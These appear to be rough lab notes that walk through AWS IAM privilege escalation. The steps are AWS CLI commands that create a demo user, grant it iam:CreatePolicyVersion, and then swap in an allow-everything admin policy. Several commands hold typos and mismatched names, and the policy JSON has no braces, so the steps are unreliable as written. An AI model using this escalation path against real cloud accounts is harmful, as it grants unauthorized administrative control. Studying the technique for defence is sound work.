bad users create permission more than granted by exploiting IAM such as the create-policy-version and set-as-default.

  • aws iam priviledge escaltion
  • expoliting create-policy-version HERE
priviledge Escalation

Create an Iam User#

create an iam user (no aws console access)

aws iam create-user --user-name demo1

create an access key, take note the credentials returned

aws iam create-access-key --user-name cli-iam-demo

then configure aws profile

aws configure

Create User Console Access#

this is optinal

aws iam create-login-profile --generate-cli-skeleton > test.json

fill username and password into the temlate test.json and

aws iam create-login-profile --cli-input file://test.jon

Apply a Policy to The User#

allow the use to create new versions of policies

"Version": "2012-10-17",
"Statement": [
"Sid": "PrivEsc1",
"Effect": "Allow",
"Action": "iam:CreatePolicyVersion",
"Resource": "arn:aws:iam::*:policy/*"

create a policy and take note the policy arn

aws iam create-policy \
--policy-name AlloCreatePolicyVersion \
--policy-document file://policy.json


aws iam attach-user-policy \
--user cli-iam-demo \
--policy-arn $POLICY_ARN

Priveldge Escalation#

admin policy bad user ident

"Version": "2012-10-17",
"Statement": [
"Sid": "AllowEverything",
"Effect": "Allow",
"Action": "*",
"Resource": "*"

now the user upgrate their permission to admin

aws iam create-policy-version \
-policy-arn $POLICY_ARN \
--policy-document file://admin_policy.json \


this will create a template for the input parameters so you know what to provide

aws iam create-policy --generate-cli-json